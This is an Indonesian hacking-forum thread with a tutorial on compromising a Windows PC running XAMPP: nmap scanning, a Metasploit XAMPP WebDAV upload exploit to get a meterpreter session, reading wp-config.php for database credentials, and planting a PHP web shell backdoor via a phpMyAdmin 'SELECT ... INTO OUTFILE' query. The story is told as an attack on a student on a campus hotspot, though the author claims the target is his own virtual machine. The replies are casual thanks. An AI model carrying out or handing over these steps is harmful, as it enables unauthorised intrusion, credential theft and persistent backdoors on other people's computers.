[Share] EXPLOIT and get phpmyadmin access and upload backdoor
#1
[hide]
selamat malam rekan-rekan IBTeam sekalian.
sebelumnya saya ingin mengucapkan turut berduka cita atas meninggalnya rekan kita Red Dragon dari HN forum semoga amal ibadahnya di terima oleh Tuhan yang maha kuasa. :')

pada kesempatan kali ini saya akan berbagi sedikit ilmu yang masih tingkat bawah. jadi jangan buli yaa... hehehee
kali ini, saya akan memberi tahu cara bagaimana kita bisa mengeksploitasi pc milik korban baik yang satu jaringan maupun yang berada di luar jaringan via ip publik tentunya.
jadi kali ini saya akan membahas tutorial singkat seperti dongeng. tapi itu hanya ilustrasi saja ya. saya tetap melakukan percobaan ini secara local. karena saya menjaga kode etik perentasan. hehehee

pada suatu hari, saya jalan jalan di area hotspot sebuah kampus jurusan IT. kita bisa menebak aktifitas yang mereka lakukan selama berada di kampus apa saja. ada yang sedang iseng" buka youtube, facebookan, nonton anime hingga yang sedang coding. wah coding nih, coding apaan dulu nih? wah kalau seorang web developer, tentunya dia pasti menggunakan xampp saat menggunakan windows. ok langsung saja kita serang pc milik salah satu mahasiswa yang ada di kampus ini.
target kita kali ini adalah Windows 7 ultimate 32 bit yang sudah terinstal xampp. bagaimana saya bisa tahu? nmap saja wkwkwkkwkw
Spoiler! :
[Image: Screenshot%2Bfrom%2B2014-09-05%2B16%3A48%3A15.png]
dari sini kita bisa tahu bahwa korban menggunakan operating system windows dan mysql sedang running di dalamnya. pertanda baik jika kita bisa membuka ip korban di web browser.
Spoiler! :
[Image: Screenshot%2Bfrom%2B2014-09-05%2B16%3A48%3A30.png]
wah ternyata bisa di buka wkwkwkwkk. tenang ini target kita kali ini adalah pc saya sendiri yang sedang di jalanin via virtual box wkwkwkwkwkk

ok langsung saja kita buka metasploit untuk mengeksekusinya.
Quote:msfconsole
dan langsung cari exploit untuk xampp dengan cara
Quote:search xampp
Spoiler! :
[Image: Screenshot%2Bfrom%2B2014-09-05%2B16%3A50%3A29.png]

setelah kita mendapatkan exploit yang kita butuhkan, kita bisa masukan opsi tersebut dengan cara
Quote:use exploit/windows/http/xampp_webdav_upload_php
lalu kita check apa saja yang di butuhkan untuk melaksanakan exploitasi tersebut. eh ternyata cuman butuh ip korbannya doang wakakakkakakk
Spoiler! :
[Image: Screenshot%2Bfrom%2B2014-09-05%2B16%3A50%3A43.png]

kita bisa memasukan ip korban dengan cara
Quote:set RHOST ip_korban
Spoiler! :
[Image: Screenshot%2Bfrom%2B2014-09-05%2B16%3A50%3A57.png]

setelah kita memasukan ip korban, kita langsung saja
Quote:exploit
Spoiler! :
[Image: Screenshot%2Bfrom%2B2014-09-05%2B16%3A52%3A01.png]
dan hasilnya adalah kita sudah masuk ke meterpreter. tandanya kita sudah mendapatkan hak akses penuh dari pc korban.

tidak sampai disitu kali ini saya ingin sekali memasang shell backdoor ke pc korban untuk jaga jaga kalau mau usilin dia hehehee.
secara otomatis shell metasploit yang kita gunakan tersimpan di folder webdav. jadi kita mundur satu directory untuk mencari htdocs (folder setara /var/www jika di linux)
Spoiler! :
[Image: Screenshot%2Bfrom%2B2014-09-05%2B16%3A52%3A12.png]
kita langsung masuk saja ke directory htdocs untuk beriseng ria heehehee
Spoiler! :
[Image: Screenshot%2Bfrom%2B2014-09-05%2B16%3A52%3A27.png]

ahh nggak cukup iseng, kebetulan korban menggunakan wordpress jadi kita bisa tahu dengan mudah username password phpmyadmin milik korban di wp-config.php
kita bisa melihatnya dengan cara
Quote:cat wp-config.php
Spoiler! :
[Image: Screenshot%2Bfrom%2B2014-09-05%2B16%3A52%3A52.png]
akhirnya kita bisa tahu username password untuk phpmyadminnya yaitu username:root passConfusedony hehehee
sekarang kita coba upload via meterpreter shell backdoor untuk jaga jaga aja
Spoiler! :
[Image: Screenshot%2Bfrom%2B2014-09-05%2B16%3A53%3A38.png]
wahh ternyata nggak bisa di upload via meterpreter. ok dah kita coba upload via phpmyadmin aja yakk wkwkwkwkk

kita masuk dengan username dan password yang kita dapatkan dari wp-config tadi.
Spoiler! :
[Image: Screenshot%2Bfrom%2B2014-09-05%2B16%3A53%3A54.png]

dan walaaahh akhirnya masuukk wkwkwkwkkwkwk
Spoiler! :
[Image: Screenshot%2Bfrom%2B2014-09-05%2B16%3A54%3A02.png]

lalu kita pilih menu SQL dan isikan
Quote:select "copas shell backdoor kamu disini" into outfile 'source document_root/namabackdoor.php'
Spoiler! :
[Image: Screenshot%2Bfrom%2B2014-09-05%2B17%3A05%3A20.png]
untuk mengetahui source directory document_root korban anda bisa cari di ip_korban/xampp dan pilih phpinfo()
Spoiler! :
[Image: Screenshot%2Bfrom%2B2014-09-05%2B16%3A49%3A03.png]

nah kalau sudah ketemu langsung saja kita isi sql tersebut dan klik go!
Spoiler! :
[Image: Screenshot%2Bfrom%2B2014-09-05%2B17%3A05%3A59.png]
setelah klik go mungkin akan muncul tulisan seperti ini
Spoiler! :
[Image: Screenshot%2Bfrom%2B2014-09-05%2B17%3A06%3A06.png]
tapi itu tidak apa apa. abaikan saja wkwkwkkw.
sekarang kita tinggal buka shell backdoor yang kita pasang barusan dengan cara:
Quote:ip_korban/nama_shell_backdoor.php
dan akhirnya berhasil heheheheee
Spoiler! :
[Image: Screenshot%2Bfrom%2B2014-09-05%2B17%3A06%3A22.png]

sekian tutorial sederhana dari saya. mohon maaf apabila ada yang tidak berkenan.
semoga bermanfaat Smile
[/hide]

#2
ajarin koding dong mas ganteng...besok tak ke kost yaaa...

#3
(09-05-2014, 09:30 PM)agoes riyanto Wrote: ajarin koding dong mas ganteng...besok tak ke kost yaaa...
bahh ane nggak bisa koding pak wakakakak =))
Information Is The Most Dangerous Weapon In The World

#4
gambarnya g keliatan,,, re upload lagi...pliss
cara yang salah memperingati hari kartini, contohlah jiwa nasionalisme ya dan emansipasinya, bukan cara berpakainya.

#5
(09-05-2014, 10:00 PM)tirtana Wrote: gambarnya g keliatan,,, re upload lagi...pliss

nggak kelihatan gimana om? tulisan nggak kelihatannya apa? di tempat ane dan temen ane kelihatan kok. :-?
Information Is The Most Dangerous Weapon In The World

#6
udah lama nggak ada yang seperti ini,....
thank berat om,... Big Grin
jujur om,... ane jatuh cinta itu sama desktop ente,.... >Big Grin<
5forA

#7
(09-05-2014, 10:23 PM)5forA Wrote: udah lama nggak ada yang seperti ini,....
thank berat om,... Big Grin
jujur om,... ane jatuh cinta itu sama desktop ente,.... >Big Grin<

heheee makasih banyak om :d
ahh desktop ane standar om. cuman pasang conky ama cairo dock doang om :d
Information Is The Most Dangerous Weapon In The World

#8
wkwkwk....
itu mah udah nggak standart om,... :p
5forA

#9
(09-05-2014, 10:52 PM)5forA Wrote: wkwkwk....
itu mah udah nggak standart om,... :p

cuman ganti shock breaker ama velg doang om. ban masih standar wakakakak =))
Information Is The Most Dangerous Weapon In The World

#10
thanks bro tutsnya izin cicip haha...






Users browsing this thread: 1 Guest(s)